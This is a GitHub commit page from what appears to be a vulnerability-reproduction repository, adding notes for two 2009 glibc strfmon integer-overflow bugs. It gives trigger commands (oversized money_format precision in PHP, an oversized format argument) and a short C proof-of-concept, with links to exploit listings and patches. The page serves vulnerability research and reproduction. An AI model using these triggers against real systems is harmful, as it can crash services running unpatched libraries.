Skip to content
Permalink
Browse files

add info for CVE-2009-4880/4881

  • Loading branch information...
mudongliang committed May 31, 2018
1 parent 2716377 commit c15d0e2025d5b54b672b394fa05f0efdf7a4e218
Showing with 63 additions and 3 deletions.
  1. +31 −0 CVE-2009-4880/README.md
  2. +19 −1 CVE-2009-4881/README.md
  3. +11 −0 CVE-2009-4881/poc.c
  4. +2 −2 README.md
@@ -2,14 +2,45 @@

## Experiment Environment

CentOS 5.5

## INSTALL & Configuration

Preinstalled environment and install php

```
tar -xvf php-5.2.9.tar.gz
cd php-5.2.9
./configure
make
```

## Problems in Installation & Configuration


## How to trigger vulnerability

```
./sapi/cli/php -r 'money_format("%.1073741821i",1);'
./sapi/cli/php -r 'money_format("%.1343741821i",1);'
```

## PoCs

[ GNU glibc 'strfmon()' Function Integer Overflow Weakness](https://bugs.gentoo.org/285818)

[GNU glibc 'strfmon()' Function Integer Overflow Weakness](https://www.securityfocus.com/bid/36443/exploit)

[GNU glibc 2.x - 'strfmon()' Integer Overflow](https://www.exploit-db.com/exploits/33230/)

## Vulnerability Patch

### Root Cause

### Stack Trace

### Patch

See details in <https://sourceware.org/git/?p=glibc.git;a=commit;h=199eb0de8d673fb23aa127721054b4f1803d61f3>

## References
@@ -1,19 +1,37 @@
# CVE/EDB ID
# CVE-2009-4881

## Experiment Environment

CentOS 5.5

## INSTALL & Configuration

Preinstalled environment

## Problems in Installation & Configuration


## How to trigger vulnerability

```
gcc -o pln poc.c
./pln %99999999999999999999n
```

## PoCs

[CVE-2009-4881 glibc (32-bit): Integer overflow in the __vstrfmon_l function](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2009-4881)

[libc (strfmon) Multiple vulnerabilities](http://cxsecurity.com/issue/WLB-2008030063)

## Vulnerability Details & Patch

### Root Cause

### Stack Trace

### Patch

<https://sourceware.org/git/?p=glibc.git;a=blobdiff;f=stdlib/strfmon_l.c;h=8e63d459e3a15ad6777be1d613216f92f398d64e;hp=c9f3a47b41d27a6c393ffbda86328c8ca569e623;hb=153aa31b93be22e01b236375fb02a9f9b9a0195f;hpb=59a7162b17f55cb292844e37ceb9c3b0a1994080>

## References
@@ -0,0 +1,11 @@
#include <stdio.h>
#include <monetary.h>

int main(int argc, char* argv[]){
char buff[51];
char *bux=buff;
int res;

res=strfmon(bux, 50, argv[1], "0");
return 0;
}
@@ -141,8 +141,8 @@ If you encounter problems with keyword "Failed to lock files", you could try to
- [ ] CVE-2009-3050
- [ ] CVE-2009-3586
- [ ] CVE-2009-4134
- [ ] CVE-2009-4880
- [ ] CVE-2009-4881
- [x] CVE-2009-4880
- [x] CVE-2009-4881
- [x] CVE-2009-5018
- [x] CVE-2010-1147
- [x] CVE-2010-1159

0 comments on commit c15d0e2

Please sign in to comment.
You can’t perform that action at this time.